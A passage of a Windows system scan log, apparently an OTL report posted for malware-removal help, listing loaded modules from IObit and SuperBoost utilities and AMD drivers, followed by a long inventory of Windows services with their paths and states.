MOD - [2016/07/22 12:20:28 | 000,075,040 | ---- | M] (IObit) -- C:\Program Files (x86)\IObit\Smart Defrag\dataexchange.dll
MOD - [2016/07/04 23:17:58 | 000,266,560 | ---- | M] () -- B:\Steam\openvr_api.dll
MOD - [2016/03/25 13:33:08 | 001,548,064 | ---- | M] (IObit) -- C:\Program Files (x86)\IObit\Smart Defrag\GameScaner.dll
MOD - [2016/02/02 08:53:02 | 000,629,056 | ---- | M] () -- C:\Program Files (x86)\SuperBoost\Superb Game Boost\SgbStatistics.dll
MOD - [2016/01/29 17:03:40 | 000,337,216 | ---- | M] () -- C:\Program Files (x86)\SuperBoost\Superb Game Boost\taskmgr.dll
MOD - [2016/01/29 14:21:06 | 000,276,800 | ---- | M] () -- C:\Program Files (x86)\SuperBoost\Superb Game Boost\D3DX8Wrapper.dll
MOD - [2016/01/11 16:03:24 | 000,899,872 | ---- | M] () -- C:\Program Files (x86)\IObit\Smart Defrag\webres.dll
MOD - [2016/01/11 16:03:00 | 000,085,280 | ---- | M] (IObit) -- C:\Program Files (x86)\IObit\Smart Defrag\SDDriverMgr.dll
MOD - [2016/01/11 16:02:48 | 000,630,048 | ---- | M] () -- C:\Program Files (x86)\IObit\Smart Defrag\ProductStatistics.dll
MOD - [2015/12/28 13:50:44 | 000,694,192 | ---- | M] (SQLite Development Team) -- C:\Program Files (x86)\IObit\Advanced SystemCare\sqlite3.dll
MOD - [2015/12/23 18:32:46 | 002,008,864 | ---- | M] (Embarcadero Technologies, Inc.) -- C:\Program Files (x86)\IObit\Advanced SystemCare\vcl120.bpl
MOD - [2015/12/23 18:32:44 | 001,108,256 | ---- | M] (Embarcadero Technologies, Inc.) -- C:\Program Files (x86)\IObit\Advanced SystemCare\rtl120.bpl
MOD - [2015/01/13 17:46:34 | 000,048,544 | ---- | M] (Advanced Micro Devices, Inc. ) -- C:\Windows\SysWOW64\atiuxpag.dll
MOD - [2015/01/13 17:45:58 | 000,038,768 | ---- | M] (Advanced Micro Devices, Inc. ) -- C:\Windows\SysWOW64\atiu9pag.dll
MOD - [2015/01/13 17:45:54 | 000,929,736 | ---- | M] (Advanced Micro Devices, Inc. ) -- C:\Windows\SysWOW64\aticfx32.dll
MOD - [2015/01/13 17:45:46 | 006,853,272 | ---- | M] (Advanced Micro Devices, Inc. ) -- C:\Windows\SysWOW64\atidxx32.dll
MOD - [2015/01/13 17:45:38 | 004,782,960 | ---- | M] (Advanced Micro Devices, Inc. ) -- C:\Windows\SysWOW64\atiumdva.dll
MOD - [2015/01/13 17:45:32 | 006,282,616 | ---- | M] (Advanced Micro Devices, Inc. ) -- C:\Windows\SysWOW64\atiumdag.dll
MOD - [2015/01/13 16:20:56 | 000,364,544 | ---- | M] (Advanced Micro Devices, Inc.) -- C:\Windows\SysWOW64\atiadlxy.dll
MOD - [2014/08/07 08:54:36 | 002,106,216 | ---- | M] (Microsoft Corporation) -- C:\Program Files (x86)\SuperBoost\Superb Game Boost\D3DCompiler_43.dll
MOD - [2014/07/22 12:25:20 | 001,998,168 | ---- | M] (Microsoft Corporation) -- C:\Program Files (x86)\SuperBoost\Superb Game Boost\D3DX9_43.dll
MOD - [2014/07/22 12:25:20 | 000,470,880 | ---- | M] (Microsoft Corporation) -- C:\Program Files (x86)\SuperBoost\Superb Game Boost\d3dx10_43.dll
MOD - [2014/07/22 12:25:20 | 000,248,672 | ---- | M] (Microsoft Corporation) -- C:\Program Files (x86)\SuperBoost\Superb Game Boost\d3dx11_43.dll


[color=#E56717]========== Services (All) ==========[/color]

SRV:[b]64bit:[/b] - File not found [Disabled | Stopped] -- C:\Program Files\ZWJjMmUxMDI1ZTI4NDQ\MDRlN.exe -- (ZWJjMmUxMDI1ZTI4NDQ)
SRV:[b]64bit:[/b] - [2018/07/13 20:25:10 | 000,190,536 | ---- | M] (Parsec) [Disabled | Stopped] -- C:\Program Files\Parsec\pservice.exe -- (Parsec)
SRV:[b]64bit:[/b] - [2018/06/27 11:10:44 | 000,131,288 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\osrss.dll -- (osrss)
SRV:[b]64bit:[/b] - [2018/06/06 15:08:00 | 007,845,424 | ---- | M] (INCA Internet Co., Ltd.) [On_Demand | Stopped] -- C:\Windows\SysNative\GameMon.des -- (npggsvc)
SRV:[b]64bit:[/b] - [2018/05/14 19:32:16 | 000,176,624 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\WirelessKB850NotificationService.exe -- (WirelessKB850NotificationService)
SRV:[b]64bit:[/b] - [2018/05/09 12:48:14 | 006,541,008 | ---- | M] (Malwarebytes) [Auto | Running] -- C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe -- (MBAMService)
SRV:[b]64bit:[/b] - [2018/03/30 13:34:45 | 000,956,416 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\Spectrum.exe -- (spectrum)
SRV:[b]64bit:[/b] - [2018/03/30 06:05:17 | 000,059,808 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\hvhostsvc.dll -- (HvHost)
SRV:[b]64bit:[/b] - [2018/03/30 05:58:44 | 000,898,216 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\CoreMessaging.dll -- (CoreMessagingRegistrar)
SRV:[b]64bit:[/b] - [2018/03/30 05:57:47 | 000,540,064 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\pcasvc.dll -- (PcaSvc)
SRV:[b]64bit:[/b] - [2018/03/30 05:51:33 | 000,902,928 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\winhttp.dll -- (WinHttpAutoProxySvc)
SRV:[b]64bit:[/b] - [2018/03/30 05:48:52 | 000,819,104 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\SysNative\AppVClient.exe -- (AppVClient)
SRV:[b]64bit:[/b] - [2018/03/30 04:37:08 | 001,298,944 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\usocore.dll -- (UsoSvc)
SRV:[b]64bit:[/b] - [2018/03/30 04:32:57 | 000,048,640 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\LicenseManagerSvc.dll -- (LicenseManager)
SRV:[b]64bit:[/b] - [2018/03/30 04:32:56 | 000,057,856 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\efssvc.dll -- (EFS)
SRV:[b]64bit:[/b] - [2018/03/30 04:32:04 | 000,198,144 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ScDeviceEnum.dll -- (ScDeviceEnum)
SRV:[b]64bit:[/b] - [2018/03/30 04:31:55 | 000,030,720 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\nsisvc.dll -- (nsi)
SRV:[b]64bit:[/b] - [2018/03/30 04:31:39 | 000,334,848 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dusmsvc.dll -- (DusmSvc)
SRV:[b]64bit:[/b] - [2018/03/30 04:31:30 | 000,175,616 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\TimeBrokerServer.dll -- (TimeBrokerSvc)
SRV:[b]64bit:[/b] - [2018/03/30 04:31:30 | 000,090,112 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\keyiso.dll -- (KeyIso)
SRV:[b]64bit:[/b] - [2018/03/30 04:31:27 | 000,151,552 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\dssvc.dll -- (DsSvc)
SRV:[b]64bit:[/b] - [2018/03/30 04:31:23 | 000,286,208 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicvmsession)
SRV:[b]64bit:[/b] - [2018/03/30 04:31:23 | 000,286,208 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmictimesync)
SRV:[b]64bit:[/b] - [2018/03/30 04:31:23 | 000,286,208 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicshutdown)
SRV:[b]64bit:[/b] - [2018/03/30 04:31:23 | 000,286,208 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmickvpexchange)
SRV:[b]64bit:[/b] - [2018/03/30 04:31:23 | 000,286,208 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicheartbeat)
SRV:[b]64bit:[/b] - [2018/03/30 04:31:23 | 000,286,208 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicguestinterface)
SRV:[b]64bit:[/b] - [2018/03/30 04:31:05 | 000,795,136 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\NaturalAuth.dll -- (NaturalAuthentication)
SRV:[b]64bit:[/b] - [2018/03/30 04:30:56 | 000,144,896 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\appinfo.dll -- (Appinfo)
SRV:[b]64bit:[/b] - [2018/03/30 04:30:54 | 000,188,928 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\certprop.dll -- (SCPolicySvc)
SRV:[b]64bit:[/b] - [2018/03/30 04:30:54 | 000,188,928 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\certprop.dll -- (CertPropSvc)
SRV:[b]64bit:[/b] - [2018/03/30 04:30:48 | 000,208,384 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\tetheringservice.dll -- (icssvc)
SRV:[b]64bit:[/b] - [2018/03/30 04:30:40 | 000,588,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\SmsRouterSvc.dll -- (SmsRouter)
SRV:[b]64bit:[/b] - [2018/03/30 04:30:35 | 000,369,664 | ---- | M] (Microsoft Corporation) [Auto | Unknown] -- C:\Windows\SysNative\APHostService.dll -- (OneSyncSvc)
SRV:[b]64bit:[/b] - [2018/03/30 04:30:33 | 000,465,920 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wcncsvc.dll -- (wcncsvc)
SRV:[b]64bit:[/b] - [2018/03/30 04:30:32 | 000,309,760 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvcext.dll -- (vmicvss)
SRV:[b]64bit:[/b] - [2018/03/30 04:30:32 | 000,309,760 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvcext.dll -- (vmicrdv)
SRV:[b]64bit:[/b] - [2018/03/30 04:30:08 | 000,284,672 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\SystemEventsBrokerServer.dll -- (SystemEventsBroker)
SRV:[b]64bit:[/b] - [2018/03/30 04:29:55 | 000,555,520 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\SensorService.dll -- (SensorService)
SRV:[b]64bit:[/b] - [2018/03/30 04:29:48 | 000,253,440 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dot3svc.dll -- (dot3svc)
SRV:[b]64bit:[/b] - [2018/03/30 04:29:41 | 000,791,552 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\PhoneService.dll -- (PhoneSvc)
SRV:[b]64bit:[/b] - [2018/03/30 04:29:36 | 000,341,504 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\pnrpsvc.dll -- (PNRPsvc)
SRV:[b]64bit:[/b] - [2018/03/30 04:29:36 | 000,341,504 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\pnrpsvc.dll -- (p2pimsvc)
SRV:[b]64bit:[/b] - [2018/03/30 04:29:14 | 000,423,936 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\p2psvc.dll -- (p2psvc)
SRV:[b]64bit:[/b] - [2018/03/30 04:29:11 | 000,379,392 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dhcpcore.dll -- (Dhcp)
SRV:[b]64bit:[/b] - [2018/03/30 04:28:34 | 000,984,064 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\IKEEXT.DLL -- (IKEEXT)
SRV:[b]64bit:[/b] - [2018/03/30 04:28:32 | 000,970,240 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\SysNative\sysmain.dll -- (SysMain)
SRV:[b]64bit:[/b] - [2018/03/30 04:28:12 | 000,820,224 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\iphlpsvc.dll -- (iphlpsvc)
SRV:[b]64bit:[/b] - [2018/03/30 04:28:10 | 000,366,080 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\nlasvc.dll -- (NlaSvc)
SRV:[b]64bit:[/b] - [2018/03/30 04:28:03 | 001,245,184 | ---- | M] (Microsoft Corporation) [On_Demand | Unknown] -- C:\Windows\SysNative\Unistore.dll -- (UnistoreSvc)
SRV:[b]64bit:[/b] - [2018/03/30 04:28:01 | 000,951,808 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\usermgr.dll -- (UserManager)
SRV:[b]64bit:[/b] - [2018/03/30 04:27:55 | 000,813,568 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\bisrv.dll -- (BrokerInfrastructure)
SRV:[b]64bit:[/b] - [2018/03/30 04:27:51 | 000,889,856 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wcmsvc.dll -- (Wcmsvc)
SRV:[b]64bit:[/b] - [2018/03/30 04:27:42 | 000,228,352 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\ssdpsrv.dll -- (SSDPSRV)
SRV:[b]64bit:[/b] - [2018/03/30 04:27:01 | 003,170,816 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppXDeploymentServer.dll -- (AppXSvc)
SRV:[b]64bit:[/b] - [2018/03/30 04:26:27 | 001,573,376 | ---- | M] (Microsoft Corporation) [On_Demand | Unknown] -- C:\Windows\SysNative\UserDataService.dll -- (UserDataSvc)
SRV:[b]64bit:[/b] - [2018/03/30 04:26:11 | 000,765,952 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\spoolsv.exe -- (Spooler)
SRV:[b]64bit:[/b] - [2018/03/30 04:26:03 | 001,816,576 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wevtsvc.dll -- (EventLog)
SRV:[b]64bit:[/b] - [2018/03/30 04:26:02 | 001,955,328 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\PeerDistSvc.dll -- (PeerDistSvc)
SRV:[b]64bit:[/b] - [2018/03/30 04:25:54 | 001,424,896 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wwansvc.dll -- (WwanSvc)
SRV:[b]64bit:[/b] - [2018/03/30 04:25:51 | 000,374,272 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\ncbservice.dll -- (NcbService)
SRV:[b]64bit:[/b] - [2018/03/30 04:25:43 | 000,880,640 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\schedsvc.dll -- (Schedule)
SRV:[b]64bit:[/b] - [2018/03/30 04:25:42 | 000,276,480 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wkssvc.dll -- (LanmanWorkstation)
SRV:[b]64bit:[/b] - [2018/03/30 04:25:39 | 000,270,848 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\srvsvc.dll -- (LanmanServer)
SRV:[b]64bit:[/b] - [2018/03/30 04:25:32 | 002,528,256 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wlansvc.dll -- (WlanSvc)
SRV:[b]64bit:[/b] - [2018/03/30 04:25:29 | 000,841,216 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\BFE.DLL -- (BFE)
SRV:[b]64bit:[/b] - [2018/03/30 04:24:21 | 000,925,184 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\MPSSVC.dll -- (MpsSvc)
SRV:[b]64bit:[/b] - [2018/03/30 04:23:36 | 000,963,584 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\StorSvc.dll -- (StorSvc)
SRV:[b]64bit:[/b] - [2018/03/30 04:23:25 | 000,246,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wscsvc.dll -- (wscsvc)
SRV:[b]64bit:[/b] - [2018/03/30 04:23:09 | 000,387,584 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\SessEnv.dll -- (SessionEnv)
SRV:[b]64bit:[/b] - [2018/03/13 07:51:24 | 002,896,896 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify)
SRV:[b]64bit:[/b] - [2018/03/13 06:32:07 | 000,286,720 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dnsrslvr.dll -- (Dnscache)
SRV:[b]64bit:[/b] - [2018/03/13 06:28:37 | 001,967,104 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\FntCache.dll -- (FontCache)
SRV:[b]64bit:[/b] - [2018/03/13 06:25:36 | 001,346,560 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\qmgr.dll -- (BITS)
SRV:[b]64bit:[/b] - [2018/03/13 06:24:41 | 000,205,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\sensrsvc.dll -- (SensrSvc)
SRV:[b]64bit:[/b] - [2018/03/13 06:24:22 | 001,275,904 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\gpsvc.dll -- (gpsvc)
SRV:[b]64bit:[/b] - [2018/03/13 06:23:28 | 000,217,088 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\WebClnt.dll -- (WebClient)
SRV:[b]64bit:[/b] - [2018/03/13 06:23:22 | 001,556,992 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\VSSVC.exe -- (VSS)
SRV:[b]64bit:[/b] - [2018/03/01 08:17:39 | 000,519,152 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\SecurityHealthService.exe -- (SecurityHealthService)
SRV:[b]64bit:[/b] - [2018/03/01 06:47:13 | 000,484,352 | ---- | M] (Microsoft Corporation) [Auto | Unknown] -- C:\Windows\SysNative\cdpusersvc.dll -- (CDPUserSvc)
SRV:[b]64bit:[/b] - [2018/03/01 06:39:06 | 002,222,592 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wlidsvc.dll -- (wlidsvc)
SRV:[b]64bit:[/b] - [2018/02/10 07:14:34 | 004,504,464 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\sppsvc.exe -- (sppsvc)
SRV:[b]64bit:[/b] - [2018/02/10 07:06:57 | 000,824,896 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ClipSVC.dll -- (ClipSVC)
SRV:[b]64bit:[/b] - [2018/02/10 07:06:48 | 004,486,904 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\Windows.StateRepository.dll -- (StateRepository)
SRV:[b]64bit:[/b] - [2018/02/10 05:50:14 | 001,313,792 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\InstallService.dll -- (InstallService)
SRV:[b]64bit:[/b] - [2018/02/10 05:44:07 | 000,302,592 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\EnterpriseAppMgmtSvc.dll -- (EntAppSvc)
SRV:[b]64bit:[/b] - [2018/02/10 05:42:47 | 000,975,872 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wbiosrvc.dll -- (WbioSrvc)
SRV:[b]64bit:[/b] - [2018/02/10 05:42:20 | 000,270,336 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ListSvc.dll -- (HomeGroupListener)
SRV:[b]64bit:[/b] - [2018/02/10 05:41:59 | 000,820,224 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\netlogon.dll -- (Netlogon)
SRV:[b]64bit:[/b] - [2018/02/10 05:40:58 | 001,234,432 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\SEMgrSvc.dll -- (SEMgrSvc)
SRV:[b]64bit:[/b] - [2018/02/10 05:40:57 | 000,930,816 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rasmans.dll -- (RasMan)
SRV:[b]64bit:[/b] - [2018/02/10 05:40:22 | 000,601,088 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ipnathlp.dll -- (SharedAccess)
SRV:[b]64bit:[/b] - [2018/02/10 05:38:59 | 001,228,800 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\TokenBroker.dll -- (TokenBroker)
SRV:[b]64bit:[/b] - [2018/02/10 05:38:16 | 000,982,016 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\WINDOWS\SysNative\SearchIndexer.exe -- (WSearch)
SRV:[b]64bit:[/b] - [2018/02/10 05:38:09 | 000,699,904 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsm.dll -- (LSM)
SRV:[b]64bit:[/b] - [2018/02/10 05:37:50 | 002,784,256 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wuaueng.dll -- (wuauserv)
SRV:[b]64bit:[/b] - [2018/02/10 05:37:32 | 000,308,224 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\NetSetupSvc.dll -- (NetSetupSvc)
SRV:[b]64bit:[/b] - [2018/02/10 05:37:23 | 001,488,384 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\audiosrv.dll -- (Audiosrv)
SRV:[b]64bit:[/b] - [2018/02/10 05:36:01 | 000,685,056 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\AudioEndpointBuilder.dll -- (AudioEndpointBuilder)
SRV:[b]64bit:[/b] - [2018/02/10 05:35:01 | 000,667,136 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\FrameServer.dll -- (FrameServer)
SRV:[b]64bit:[/b] - [2018/01/01 12:20:09 | 000,104,960 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasauto.dll -- (RasAuto)
SRV:[b]64bit:[/b] - [2018/01/01 12:19:13 | 000,188,416 | ---- | M] (Microsoft Corporation) [On_Demand | Unknown] -- C:\Windows\SysNative\PimIndexMaintenance.dll -- (PimIndexMaintenanceSvc)
SRV:[b]64bit:[/b] - [2018/01/01 12:18:48 | 000,259,072 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\SysNative\SCardSvr.dll -- (SCardSvr)
SRV:[b]64bit:[/b] - [2017/12/14 02:39:35 | 004,329,952 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe -- (Sense)
SRV:[b]64bit:[/b] - [2017/12/14 02:39:18 | 000,654,848 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\RDXService.dll -- (RetailDemo)
SRV:[b]64bit:[/b] - [2017/12/14 02:39:18 | 000,254,976 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\PushToInstall.dll -- (PushToInstall)
SRV:[b]64bit:[/b] - [2017/12/14 02:39:18 | 000,238,080 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\DeviceSetupManager.dll -- (DsmSvc)
SRV:[b]64bit:[/b] - [2017/12/14 02:39:18 | 000,227,328 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\CapabilityAccessManager.dll -- (camsvc)
SRV:[b]64bit:[/b] - [2017/12/14 02:39:18 | 000,151,040 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\umpo.dll -- (Power)
SRV:[b]64bit:[/b] - [2017/09/30 15:41:49 | 000,283,648 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\umrdp.dll -- (UmRdpService)
SRV:[b]64bit:[/b] - [2017/09/30 15:41:43 | 000,132,608 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\browser.dll -- (Browser)
SRV:[b]64bit:[/b] - [2017/09/30 15:41:42 | 001,190,400 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\SysNative\AgentService.exe -- (UevAgentService)
SRV:[b]64bit:[/b] - [2017/09/30 15:41:41 | 000,425,984 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\assignedaccessmanagersvc.dll -- (AssignedAccessManagerSvc)
SRV:[b]64bit:[/b] - [2017/09/30 15:41:38 | 000,196,096 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\appmgmts.dll -- (AppMgmt)
SRV:[b]64bit:[/b] - [2017/09/30 15:41:33 | 000,727,552 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\SysNative\cscsvc.dll -- (CscService)
SRV:[b]64bit:[/b] - [2017/09/29 14:43:18 | 000,640,512 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\FXSSVC.exe -- (Fax)
SRV:[b]64bit:[/b] - [2017/09/29 14:43:11 | 000,636,416 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppReadiness.dll -- (AppReadiness)
SRV:[b]64bit:[/b] - [2017/09/29 14:43:11 | 000,431,104 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\WalletService.dll -- (WalletService)
SRV:[b]64bit:[/b] - [2017/09/29 14:43:09 | 000,387,072 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\bdesvc.dll -- (BDESVC)
SRV:[b]64bit:[/b] - [2017/09/29 14:43:02 | 001,526,784 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wbengine.exe -- (wbengine)
SRV:[b]64bit:[/b] - [2017/09/29 14:42:08 | 001,346,560 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\lpasvc.dll -- (wlpasvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:42:07 | 000,622,080 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\WFDSConMgrSvc.dll -- (WFDSConMgrSvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:42:07 | 000,563,712 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\w32time.dll -- (W32Time)
SRV:[b]64bit:[/b] - [2017/09/29 14:42:07 | 000,421,376 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\SharedRealitySvc.dll -- (SharedRealitySvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:42:07 | 000,254,976 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netman.dll -- (Netman)
SRV:[b]64bit:[/b] - [2017/09/29 14:42:07 | 000,122,368 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\fhsvc.dll -- (fhsvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:42:07 | 000,024,576 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\irmon.dll -- (irmon)
SRV:[b]64bit:[/b] - [2017/09/29 14:42:06 | 000,109,056 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\eapsvc.dll -- (Eaphost)
SRV:[b]64bit:[/b] - [2017/09/29 14:42:06 | 000,088,064 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\NcdAutoSetup.dll -- (NcdAutoSetup)
SRV:[b]64bit:[/b] - [2017/09/29 14:42:05 | 001,462,272 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\pla.dll -- (pla)
SRV:[b]64bit:[/b] - [2017/09/29 14:42:05 | 000,460,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\swprv.dll -- (swprv)
